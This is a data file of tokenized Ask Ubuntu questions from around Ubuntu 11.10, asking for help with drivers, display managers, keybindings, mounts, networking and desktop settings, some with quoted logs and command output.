77272	how to ignore ctrl-a when a different escape sequence is already chosen	with release 11.10 , an old byobu setting i had from screen no longer works . i used to just add esacpe `` at the end of ~/.byobu/keybindings to make the tickmark by escape for byobu key sequences . that allowed me to free ctrl-a to get the standard readline / bash / emacs / ... emacs behaviour of jumping to the beginning of the line . no more . now byobu-ctrl-a interjects , and i have not been able to figure out to the old behaviour ( in essence : all defaults , but ` as escape sequence ) back . hints , or better still , solutions , would be greatly appreciated .
77276	open source alternatives to cybercafe pro	i am looking for some great open source alternatives that is very easy to set up and administer . thanks in advance
77290	how do i mount the documents folder on a different partition ?	i 'm new to unity and trying to harmonize my dual boot between windows and ubuntu by setting the documents , pictures , videos , etc folders onto a storage partition , instead of in the home folder . i added this line to my fstab # storage mount uuid=66e53aec54455db2 /media/storage/ ntfs-3g auto , user , rw 0 0 rebooted , then went to configure my subfolders like this : # this file is written by xdg-user-dirs-update # if you want to change or add directories , just edit the line you're # interested in . all local changes will be retained on the next run # format is xdg_xxx_dir= '' $ home/yyy '' , where yyy is a shell-escaped # homedir-relative path , or xdg_xxx_dir= '' /yyy '' , where /yyy is an # absolute path . no other format is supported . # xdg_desktop_dir= '' $ home/desktop '' xdg_templates_dir= '' $ home/templates '' xdg_download_dir= '' /media/storage/downloads '' xdg_publicshare_dir= '' $ home/public '' xdg_documents_dir= '' /media/storage/documents '' xdg_music_dir= '' /media/storage/music '' xdg_pictures_dir= '' /media/storage/pictures '' xdg_videos_dir= '' /media/storage/videos '' rebooted again , but this did n't do the trick . i can get to media/storage/documents from the filesystem , but when i go to documents under places , it 's still located on the wrong dirve . nothing i save appears on the storage partitition unless i directly put it there , and nothing i put in the storage partition appears in the documents folder under places .
77294	dash not searching files	unity 's dash is not searching files that i have opened before , only applications . neither global nor files lenses are showing any results . in then files lens , i can view most recent documents , but that 's it . i suspect it is caused by my home folder 's encryption , due to errors displayed in /var/log/syslog : [ 1868.382095 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 1868.382099 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x000000000000000f ] )
77298	export display - ca n't open display	i 'm running xubuntu 11.10 . from php , i 'm calling a shell that exports the display and then calls wmctrl . every time i call wmctrl , i see an error `` can not open display '' . i call my shell from php : $ output = shell_exec ( '/var/www/wmctrl.sh ' ) ; my hostname is steven-z-class here is my shell script : # ! /bin/bash export display=steven-z-class:0.0 echo $ display wmctrl -m when i run this , i see the echoed display value in my php page : steven-z-class:0.0 however , wmctl does not run . i see this error in the apache log : can not open display . any ideas why wmctrl ca n't open the display ?
77299	how to add songs queued by the music lens to `` now playing '' in banshee ?	when you add a song from the unity music lens , it gets added to the `` file system queue '' in banshee . the problem is that , the file system queue being its own `` playlist '' , when the song is finished banshee will continue playing only the songs in the file system queue i.e . only the songs i 've added through the lens or nautilus . is there anyway to make banshee , once it completes the song specified in the music lens , return to its original playlist/playback ? i usually just play directly off of my entire music library ( not in playlists ) , so i guess that it does n't have to resume playback of a specific playlist , just of the entire library . one way to solve this could be by adding the enire library to the filesystem queue , but this is obviously impractical ( and must be done manually ) . another way would be to add all my library to the `` play queue '' ( or a new playlist ) and then make banshee play songs added through the lens within the play queue/playlist ( if resuming to library is not possible ) . is there any way of doing this ?
77300	how do you obtain an @ ubuntu.com email address ?	i recently saw the question `` how to add an @ ubuntu.com email address in thunderbird '' and wondered how one obtains an @ ubuntu.com email .
77312	drivers for nvidia geforce gt 430 ?	i recently bought a nvidia geforcegt 430 . when i boot into ubuntu , it looks low quality . i think its because i do n't have the device drivers . does anyone know how to download the drivers ?
77314	how to force a proprietary driver to load on startup ?	i 've been having some problems with the driver for a wireless nic supplied with the 3.0.0 kernel . i 've compiled and installed the proprietary driver for it , so that i can switch it once the system has booted with : # remove the driver included with the kernel sudo modprobe -r rtl8192cu # use the proprietary driver sudo modprobe 8192cu the module locations are rtl8192cu : /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192cu/rtl8192cu.ko 8192cu ( proprietary driver ) : /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/8192cu.ko i know these are probably very basic questions , but i 'd like to know about the following : why is the system using the driver included with the kernel ? is it because its path has some kind of priority ? or because it is included by default with the kernel ? is blacklisting the rtl8192cu module the right way to make the propietary 8192cu module load at startup ? is there any other way to make the system automatically load the proprietary driver by default ?
77318	upgrading graphics chip on notebook	i know this is n't exactly a ubuntu question but in my experience the ubuntu community has been the best and most helpful for anything vaguely computer related . i am running a dual-boot 64-bit windows 7 pro ( i suck at using wine and my windows partition is used only for games ) and ubuntu 64-bit 11.04 ( have n't upgraded to o.o . yet ) on an hp probook 4520s using an ati mobility radeon hd 5470 graphics card , and was wondering if it is possible to upgrade this card , and if so what the best card to upgrade too would be ?
77322	how to make sure my system has nvidia optimus ?	i just got a new dell xps 15 l502x with these specs : cpu intel i7 2670qm with turbo boost ( integrated graphics : intel hd 3000 ) discrete graphics : nvidia gt 525m it was ordered from dell france . before ordering it , the salesman assured me my configuration does not have nvidia implemented . i called back dell support in france and once again they told me all xps 15 with i7 have nvidia optimus disabled in them even though the systems have two graphics chipsets ( intel and nvidia ) . i installed ubuntu 11.10 but before installing bumblebee or ironhire i want to make sure my system has no optimus . the command ~ $ lspci -vnnn | grep vga gives the following : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0df5 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) how can i make sure of this . thanks in advance .
77323	why does n't gnome shell run smoothly on my hardware ?	i 'm having problems running gnome shell with my nvidia 7025/nforce 630a ( on-board ) . the animations do n't run smoothly when i configure my bios to give 512mb to the chipset . the only solution i 've found is to change the shared ram to 128mb . after this , the animations run well but i can only use 128mb for some applications . amd athlon 240x2 2.7ghz 2gb of ram
77329	what is the best way to secure my ec2 server in regards to the ssh ?	i have a amazon ec2 instance , and was curious on if i should change the username ( the default is ubuntu ) or not ? since you need a public ssh key in order to access the server , i do n't think you do , but the fact remains - should i change the username for that server ?
77330	lightdm will not start after stopping it	[ update : i appreciate the suggestions you posted , but since i could n't make anything work in the end , i ended up re-installing ubuntu a little while ago . ] i am running ubuntu 11.10 `` oneiric ocelot '' , and in trying to install the nvidia cuda developer drivers i switched to a virtual terminal ( ctrl-alt-f5 ) and stopped lightdm ( installation required that no x server instance be running ) through sudo service lightdm stop . re-starting lightdm with sudo service lightdm start did not work : a couple of * starting [ ... ] lines where displayed , but the process hanged . ( i do not remember at which point , but i think it was * starting system v runlevel compatibility . i manually rebooted my laptop , and ever since booting seems to hang , usually around the * starting anac ( h ) ronistic cron [ ok ] log line ( not consistently at that point , though ) . from that point on , i seem to be able to interact with my system only through a tty session ( ctrl-alt-f1 ) . i 've tried purging and reinstalling both lightdm and gdm , as well as selecting both as the default display managers ( through sudo dpkg-reconfigure [ lightdm / gdm ] or by manually editing /etc/x11/default-display-manager ) through both apt-get and aptitude ( that should n't make a difference anyway ) after updating the packages , but the problem persists . some of the responses i 'm getting are the following : after running sudo dpkg-reconfigure lightdm ( but not ... gdm ) i get the following message : dpkg-maintscript-helper : warning : environment variable dpkg_matinscript_name missing dpkg-maintscript-helper : warning : environment variable dpkg_matinscript_package missing after trying sudo service lightdm start or sudo start lightdm i get to see the boot loading screen again but nothing changes . if i go back to the tty shell i see lightdm start/running , process < num > but ps -e | grep lightdm gives no output . after trying sudo service gdm start or sudo starg gdm i get the gdm start/running , process < num > message , and gdm-binary is supposedly an active process , but all that happens is that the screen blinks a couple of times and nothing else . other candidate solutions that i 'd found on the web included running startx but when i try that i get an error output [ ... ] fatal server error : no screens found [ ... ] . moreover , i made sure that lightdm-gtk-greeter is installed but that did not help either . please excuse my not including complete outputs/logs ; i am writing this post from another computer and it 's hard to manually copy the complete logs . also , i 've seen several posts that had to do with similar problems , but either there was no fix , or the one suggested did not work for me . in closing : please help ! i very much hope to avoid re-installing ubuntu from scratch ! : ) alex @ mosi i did not manage to fix the nvidia kernel driver as per your instructions . i should perhaps mention that i 'm on a dell xps15 laptop with an nvidia optimus graphics card , and that i have bumblebee installed ( which installs nvidia drivers during its installation , i believe ) . issuing the mentioned commands i get the following : ~ $ uname -r 3.0.0-12-generic ~ $ lsmod | grep -i nvidia nvidia 11713772 0 ~ $ dmesg | grep -i nvidia [ 8.980041 ] nvidia : module license 'nvidia ' taints kernel . [ 9.354860 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 9.354864 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 9.354868 ] nvidia 0000:01:00.0 : enabling device ( 0006 - > 0007 ) [ 9.354873 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 9.354879 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 9.355052 ] nvrm : loading nvidia unix x86_64 kernel module 280.13 wed jul 27 16:53:56 pdt 2011 also , running aptitude search nvidia gives me the following : p nvidia-173 - nvidia binary xorg driver , kernel module a p nvidia-173-dev - nvidia binary xorg driver development file p nvidia-173-updates - nvidia binary xorg driver , kernel module a p nvidia-173-updates-dev - nvidia binary xorg driver development file p nvidia-96 - nvidia binary xorg driver , kernel module a p nvidia-96-dev - nvidia binary xorg driver development file p nvidia-96-updates - nvidia binary xorg driver , kernel module a p nvidia-96-updates-dev - nvidia binary xorg driver development file p nvidia-cg-toolkit - cg toolkit - gpu shader authoring language p nvidia-common - find obsolete nvidia drivers i nvidia-current - nvidia binary xorg driver , kernel module a p nvidia-current-dev - nvidia binary xorg driver development file c nvidia-current-updates - nvidia binary xorg driver , kernel module a p nvidia-current-updates-dev - nvidia binary xorg driver development file i nvidia-settings - tool of configuring the nvidia graphics dr p nvidia-settings-updates - tool of configuring the nvidia graphics dr v nvidia-va-driver - v nvidia-va-driver - i 've tried manually installing ( sudo aptitude install < package > ) packages nvidia-common and nvidia-settings-updates but to no avail . for example , sudo aptitude install nvidia-settings-updates returns the following log : reading package lists ... building dependency tree ... reading state information ... reading extended state information ... initializing package states ... writing extended state information ... no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 83 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . writing extended state information ... reading package lists ... building dependency tree ... reading state information ... reading extended state information ... initializing package states ... writing extended state information ... the same happens with the linux headers ( i.e . i can not seem to be able to install linux-headers-3.0.0-12-generic ) . the output of aptitude search linux-headers is as follows : v linux-headers - v linux-headers - v linux-headers-2.6 - i linux-headers-2.6.38-11 - header files related to linux kernel versi i linux-headers-2.6.38-11-generic - linux kernel headers for version 2.6.38 on i a linux-headers-2.6.38-8 - header files related to linux kernel versi i a linux-headers-2.6.38-8-generic - linux kernel headers for version 2.6.38 on v linux-headers-3 - v linux-headers-3.0 - v linux-headers-3.0 - i a linux-headers-3.0.0-12 - header files related to linux kernel versi p linux-headers-3.0.0-12-generic - linux kernel headers for version 3.0.0 on p linux-headers-3.0.0-12-generic- - linux kernel headers for version 3.0.0 on p linux-headers-3.0.0-12-server - linux kernel headers for version 3.0.0 on p linux-headers-3.0.0-12-virtual - linux kernel headers for version 3.0.0 on p linux-headers-generic - generic linux kernel headers p linux-headers-generic-pae - generic linux kernel headers v linux-headers-lbm - v linux-headers-lbm - v linux-headers-lbm-2.6 - v linux-headers-lbm-2.6 - p linux-headers-lbm-3.0.0-12-gene - header files related to linux-backports-mo p linux-headers-lbm-3.0.0-12-gene - header files related to linux-backports-mo p linux-headers-lbm-3.0.0-12-serv - header files related to linux-backports-mo p linux-headers-server - linux kernel headers on server equipment . p linux-headers-virtual - linux kernel headers for virtual machines @ heartsmagic i did try purging and reinstalling any nvidia driver packages , but it did not seem to make a difference , my xorg.conf file contains the following : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 280.13 ( buildmeister @ swio-display-x86-rhel47-03.nvidia.com ) wed jul 27 17:15:58 pdt 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
77331	upper taskbar ( move & lock ) settings missing	upper taskbar ( move & lock ) settings are gone . a computer icon replaced my shutdown button in upper right corner as well . any clues ?
77335	how do i adjust my window buttons to the left or right ?	i 'm trying to use gconf-editor to make an adjustment to my windows . in the past i had the close , min , max to the `` right '' . now i 'd like to switch back to the `` left '' . the old way does n't seem to be working for me . i tried gconf-editor , but i get errors . i did a fresh install of 11.10 , but i had my home in another partition . not sure if my old settings are causing the issue . can anyone make a suggestion ? ** ( gconf-editor:2397 ) : warning ** : index value is too large ( gconf-editor:2397 ) : glib-gobject-warning ** : g_object_get_valist : property type ' of object classgconfeditorwindow ' is not readable ( gconf-editor:2397 ) : glib-gobject-warning ** : g_object_get_valist : property type ' of object classgconfeditorwindow ' is not readable gconf error : configuration server could n't be contacted : d-bus error : method `` alldirs '' with signature `` s '' on interface `` org.gnome.gconf.database '' does n't exist ** ( gconf-editor:2397 ) : warning ** : index value is too large gconf error : configuration server could n't be contacted : d-bus error : method `` alldirs '' with signature `` s '' on interface `` org.gnome.gconf.database '' does n't exist
77336	install and configure uec error	everything moves fine but when i try to intall the image from image store it shows some error rather than images any one can help me in solving it : error 60 : server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none
77352	need help with bash checking if computer uptime is greater than 5 minutes	i have an bash script that runs on a every minute cron . it checks to see if a necessary program is running and starts it if it is not . occasionally it will run before the user has actually autologged in . i want to prevent that from happening . what i think i 'd like to do is to put a check in the check the computer 's uptime and see if it 'd been on for 5 minutes so that auto login had a chance to finish before the program gets started . i 'm fairly new to bash and parsing what i get from `` uptime '' to where i could use it for comparison seems out of my reach . can anyone help ? perhaps there is a better solution . i 'm stuck .
77356	vino-server does not work since update to 11.10	since i updated to oneric ocelot vino-server does not work on my machine any more . although i set every thing exactly as before , it is not be started when system starts or i log in . trying to start it manually with the command /usr/lib/vino/vino-server i get an error message like this : ( vino-server:20260 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion `global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed 09/11/2011 03:58:46 autoprobing tcp port in ( all ) network interface 09/11/2011 03:58:46 listening ipv6 : // [ : : ] :5900 09/11/2011 03:58:46 listening ipv4 : //0.0.0.0:5900 09/11/2011 03:58:46 autoprobing selected port 5900 09/11/2011 03:58:46 advertising security type : 'tls ' ( 18 ) 09/11/2011 03:58:46 re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 09/11/2011 03:58:46 listening ipv6 : // [ : : ] :5900 09/11/2011 03:58:46 listening ipv4 : //0.0.0.0:5900 09/11/2011 03:58:46 clearing securitytypes 09/11/2011 03:58:46 advertising security type : 'tls ' ( 18 ) 09/11/2011 03:58:46 clearing securitytypes 09/11/2011 03:58:46 advertising security type : 'tls ' ( 18 ) 09/11/2011 03:58:46 advertising authentication type : 'no authentication ' ( 1 ) 09/11/2011 03:58:46 re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 09/11/2011 03:58:46 listening ipv6 : // [ : : ] :5900 09/11/2011 03:58:46 listening ipv4 : //0.0.0.0:5900 09/11/2011 03:58:46 clearing securitytypes 09/11/2011 03:58:46 clearing authtypes 09/11/2011 03:58:46 advertising security type : 'tls ' ( 18 ) 09/11/2011 03:58:46 advertising authentication type : 'vnc authentication ' ( 2 ) 09/11/2011 03:58:46 clearing securitytypes 09/11/2011 03:58:46 clearing authtypes 09/11/2011 03:58:46 advertising security type : 'tls ' ( 18 ) 09/11/2011 03:58:46 advertising authentication type : 'vnc authentication ' ( 2 ) 09/11/2011 03:58:46 advertising security type : 'vnc authentication ' ( 2 ) *** glibc detected *** /usr/lib/vino/vino-server : malloc ( ) : memory corruption : 0x0000000001c3ff10 *** ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( +0x78a96 ) [ 0x7f5db2a7ea96 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x7a5f8 ) [ 0x7f5db2a805f8 ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_malloc+0x6d ) [ 0x7f5db2a8277d ] /usr/lib/libminiupnpc.so.5 ( soappostsubmit+0xf2 ) [ 0x7f5db3f3c202 ] /usr/lib/libminiupnpc.so.5 ( +0x35eb ) [ 0x7f5db3f3c5eb ] /usr/lib/libminiupnpc.so.5 ( upnp_getstatusinfo+0x82 ) [ 0x7f5db3f3dc32 ] /usr/lib/libminiupnpc.so.5 ( upnpigd_isconnected+0x39 ) [ 0x7f5db3f3d039 ] /usr/lib/libminiupnpc.so.5 ( upnp_getvalidigd+0x182 ) [ 0x7f5db3f3d1f2 ] /usr/lib/vino/vino-server [ 0x415e97 ] /usr/lib/vino/vino-server [ 0x4163b8 ] /usr/lib/vino/vino-server [ 0x40f1a4 ] /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ( +0xb7afa ) [ 0x7f5db56d2afa ] /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ( g_simple_async_result_complete+0x87 ) [ 0x7f5db5682c17 ] /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ( +0xafa3a ) [ 0x7f5db56caa3a ] /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ( g_simple_async_result_complete+0x87 ) [ 0x7f5db5682c17 ] /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ( +0x67d29 ) [ 0x7f5db5682d29 ] /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( g_main_context_dispatch+0x1dd ) [ 0x7f5db4629a5d ] /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( +0x45258 ) [ 0x7f5db462a258 ] /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( g_main_loop_run+0x162 ) [ 0x7f5db462a792 ] /usr/lib/vino/vino-server [ 0x40ba1b ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xed ) [ 0x7f5db2a2730d ] /usr/lib/vino/vino-server [ 0x40bafd ] ======= memory map : ======== 00400000-00443000 r-xp 00000000 08:01 1978132 /usr/lib/vino/vino-server 00642000-00643000 r -- p 00042000 08:01 1978132 /usr/lib/vino/vino-server 00643000-00645000 rw-p 00043000 08:01 1978132 /usr/lib/vino/vino-server 00645000-00652000 rw-p 00000000 00:00 0 01a87000-01c54000 rw-p 00000000 00:00 0 [ heap ] 7f5da4000000-7f5da4021000 rw-p 00000000 00:00 0 7f5da4021000-7f5da8000000 -- -p 00000000 00:00 0 7f5da95cd000-7f5da95e2000 r-xp 00000000 08:01 396975 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5da95e2000-7f5da97e1000 -- -p 00015000 08:01 396975 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5da97e1000-7f5da97e2000 r -- p 00014000 08:01 396975 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5da97e2000-7f5da97e3000 rw-p 00015000 08:01 396975 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5da97e3000-7f5da97e4000 -- -p 00000000 00:00 0 7f5da97e4000-7f5da9fe4000 rw-p 00000000 00:00 0 7f5da9fe4000-7f5da9fe5000 -- -p 00000000 00:00 0 7f5da9fe5000-7f5daa7e5000 rw-p 00000000 00:00 0 7f5daa7e5000-7f5daa7e6000 -- -p 00000000 00:00 0 7f5daa7e6000-7f5daafe6000 rw-p 00000000 00:00 0 7f5daafe6000-7f5daafea000 r-xp 00000000 08:01 2754313 /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so 7f5daafea000-7f5dab1ea000 -- -p 00004000 08:01 2754313 /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so 7f5dab1ea000-7f5dab1eb000 r -- p 00004000 08:01 2754313 /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so 7f5dab1eb000-7f5dab1ec000 rw-p 00005000 08:01 2754313 /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so 7f5dab1ec000-7f5dab1fa000 r-xp 00000000 08:01 2230326 /usr/lib/gtk-3.0/3.0.0/theming-engines/libunico.so 7f5dab1fa000-7f5dab3f9000 -- -p 0000e000 08:01 2230326 /usr/lib/gtk-3.0/3.0.0/theming-engines/libunico.so 7f5dab3f9000-7f5dab3fa000 r -- p 0000d000 08:01 2230326 /usr/lib/gtk-3.0/3.0.0/theming-engines/libunico.so 7f5dab3fa000-7f5dab3fb000 rw-p 0000e000 08:01 2230326 /usr/lib/gtk-3.0/3.0.0/theming-engines/libunico.so 7f5dab3fb000-7f5dab408000 r-xp 00000000 08:01 396987 /lib/x86_64-linux-gnu/libudev.so.0.12.0 7f5dab408000-7f5dab607000 -- -p 0000d000 08:01 396987 /lib/x86_64-linux-gnu/libudev.so.0.12.0 7f5dab607000-7f5dab608000 r -- p 0000c000 08:01 396987 /lib/x86_64-linux-gnu/libudev.so.0.12.0 7f5dab608000-7f5dab609000 rw-p 0000d000 08:01 396987 /lib/x86_64-linux-gnu/libudev.so.0.12.0 7f5dab609000-7f5dab632000 r-xp 00000000 08:01 2100143 /usr/lib/gio/modules/libgvfsdbus.so 7f5dab632000-7f5dab832000 -- -p 00029000 08:01 2100143 /usr/lib/gio/modules/libgvfsdbus.so 7f5dab832000-7f5dab833000 r -- p 00029000 08:01 2100143 /usr/lib/gio/modules/libgvfsdbus.so 7f5dab833000-7f5dab834000 rw-p 0002a000 08:01 2100143 /usr/lib/gio/modules/libgvfsdbus.so 7f5dab834000-7f5dab835000 rw-p 00000000 00:00 0 7f5dab835000-7f5dab83c000 r-xp 00000000 08:01 2106560 /usr/lib/gio/modules/libdconfsettings.so 7f5dab83c000-7f5daba3c000 -- -p 00007000 08:01 2106560 /usr/lib/gio/modules/libdconfsettings.so 7f5daba3c000-7f5daba3d000 r -- p 00007000 08:01 2106560 /usr/lib/gio/modules/libdconfsettings.so 7f5daba3d000-7f5daba3e000 rw-p 00008000 08:01 2106560 /usr/lib/gio/modules/libdconfsettings.so 7f5daba3e000-7f5daba54000 r-xp 00000000 08:01 1841289 /usr/lib/gvfs/libgvfscommon.so 7f5daba54000-7f5dabc53000 -- -p 00016000 08:01 1841289 /usr/lib/gvfs/libgvfscommon.so 7f5dabc53000-7f5dabc54000 r -- p 00015000 08:01 1841289 /usr/lib/gvfs/libgvfscommon.so 7f5dabc54000-7f5dabc55000 rw-p 00016000 08:01 1841289 /usr/lib/gvfs/libgvfscommon.so 7f5dabc55000-7f5dabc68000 r-xp 00000000 08:01 2100142 /usr/lib/gio/modules/libgioremote-volume-monitor.so 7f5dabc68000-7f5dabe67000 -- -p 00013000 08:01 2100142 /usr/lib/gio/modules/libgioremote-volume-monitor.so 7f5dabe67000-7f5dabe68000 r -- p 00012000 08:01 2100142 /usr/lib/gio/modules/libgioremote-volume-monitor.so 7f5dabe68000-7f5dabe69000 rw-p 00013000 08:01 2100142 /usr/lib/gio/modules/libgioremote-volume-monitor.so 7f5dabe69000-7f5dabe6f000 r-xp 00000000 08:01 1966386 /usr/lib/x86_64-linux-gnu/libogg.so.0.7.1 7f5dabe6f000-7f5dac06e000 -- -p 00006000 08:01 1966386 /usr/lib/x86_64-linux-gnu/libogg.so.0.7.1 7f5dac06e000-7f5dac06f000 r -- p 00005000 08:01 1966386 /usr/lib/x86_64-linux-gnu/libogg.so.0.7.1 7f5dac06f000-7f5dac070000 rw-p 00006000 08:01 1966386 /usr/lib/x86_64-linux-gnu/libogg.so.0.7.1abgebrochen what am i suppose to do ? thanks for helping !
77369	mouse disappears on second screen in 11.04 with radeon hardware	i 'm running a 5 screen setup over ( 5th screen disabled atm ) two radeon hd cards , three on a 6770 and two on a 5450 ( one disabled atm ) . when i move my mouse onto the second screen on the first card ( 6770 ) it disappears . like a ghost mouse it does function on that screen but is not visible . here 's a diagram of the setup : and a screenshot of the catalyst configuration ( it shows the two smaller lcds as crts for some reason ) . system is ( x ) ubuntu 11.04 and i 'm running the fglrx driver ( proprietary ? ) version 11.9 , the window manager is xfce4 ( installed the xubuntu package to get it ) . the weird thing is it does work occasionally ... i just do n't know what causes it to work and not work . any ideas where i could start ? cheers . edit : just confirmed it does the same thing on gnome , gnome ( without effects ) and fluxbox . ca n't test unity cos i uninstalled that . compositioning is on also .
77371	issue with adwaita dark theme : still using regular adwaita titlebars	i downloaded and installed the adwaita dark theme . it worked , but i had an issue . the title bar was supposed to turn black too , but it does n't . i followed the steps in this omg ! ubuntu article . there is a screenshot in the site with the title bars black . and here is a screenshot of my ubuntu . as you can see , i applied the adwaita theme in `` window theme '' too but it stays just like the default adwaita . why does that happen and what can i do to fix it ?
77375	how to disable screen saver in totem when playing movie ?	i 'm using ubuntu 11.10 . there 's a option in totem that says to disable screen saver while playing movie , but it does n't work . is there anything else i can do to make it work ?
77376	why are n't my songs showing up on my creative zen when i put an mp3 file on it using ubuntu ?	i transfered some mp3 songs onto my 8gb creative zen from ubuntu and when i opened the music folder using the creative zen , it played the songs fine , but when i stopped the playback and asked my zen itself to search for the songs , these files did n't even show up . is there any specific reason it can be like that ? is there anything i can do to fix it ?
77378	desktop disappeared after messing with ccsm	i recently installed ubuntu 11.10 in my laptop . yesterday i just run `` compizconfig settings manager '' and just click on preferences tab , suddenly everything on the screen disappeared . now the only thing i can see is the wallpaper . none of the keys are n't responding other than `` ctrl+alt+delete '' . i tried to run terminal by pressing `` ctrl+alt+t '' it does n't work either . so i logged out and found this switch `` ubuntu and ubuntu 2d '' on the welcome screen . i switched it to `` ubuntu 2d '' and logged in , it worked , but it 's not the same user interface i used earlier . so , please tell me what has happened to my previous ubuntu desktop , and is there any way i can fix it back to the default view ?
77379	intel network card `` not ready '' to use on an hp g71	fellow ubuntu users ! i recently dual-booted windows 7 and ubuntu 11.10 , and i am in a bit of a fix . when i want to connect to the internet with ubuntu , network manager is showing that my device is not ready to use ( exactlty device not ready ) . it works fine on windows , however , since i 'm using the same computer to type this as the one that is having the problem right now . here are the specs . if you need more , let me know ! : ) computer : hp g71 notebook internet card : intel ( r ) wifi link 1000 bgn os : ms windows 7 home premium 64-bit , ubuntu 11.10 64-bit . this is the result of using the command sudo lshw -class network : *-network disabled description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:1e:64:4d:39:04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:44 memory : d3500000-d3501fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:26:9e:7b : b0 : c0 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : d1410000-d1410fff memory : d1400000-d140ffff memory : d1420000-d142ffff
77385	how can i increase my screen resolution ?	as title states , i would like to know if it 's possible for my graphic card to have higher resolution than 1024x768 which shows as maximum resolution in display setting . my screen is 32 inch polaroid hdtv . my graphic card information : *-display description : vga compatible controller product : 82915g/gv/910gl integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : cfe80000-cfefffff ioport : c800 ( size=8 ) memory : d0000000-dfffffff memory : cfe40000-cfe7ffff i have ubuntu 11.10 . thanks in advance . as intel website states : 256-bit graphics core 8/16/32 bpp up to 8.5 gb/sec memory bandwidth with ddr2 533 mhz 1.3 gp/sec and 1.3 gt/sec fill rate 128 mb maximum video memory 2048x1536 at 85 hz maximum resolution dynamic display modes for flat-panel and wide-screen support operating systems supported : microsoft windows xp* , windows 2000* , linux*-compatible ( xfree86 source available ) xrandr shows me modes below , but few weeks earlier this way caused me to to use safe mode because the higher resolution did not work right and i was left with blank screen . xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9
77388	add update manager to the system menu in gnome shell	in unity , the update manager was included in the power cog menu along with log out , suspend , shut down etc . but in gnome shell , i do not find such an option . is there any extension or tweak to make update manager appear in that menu ?
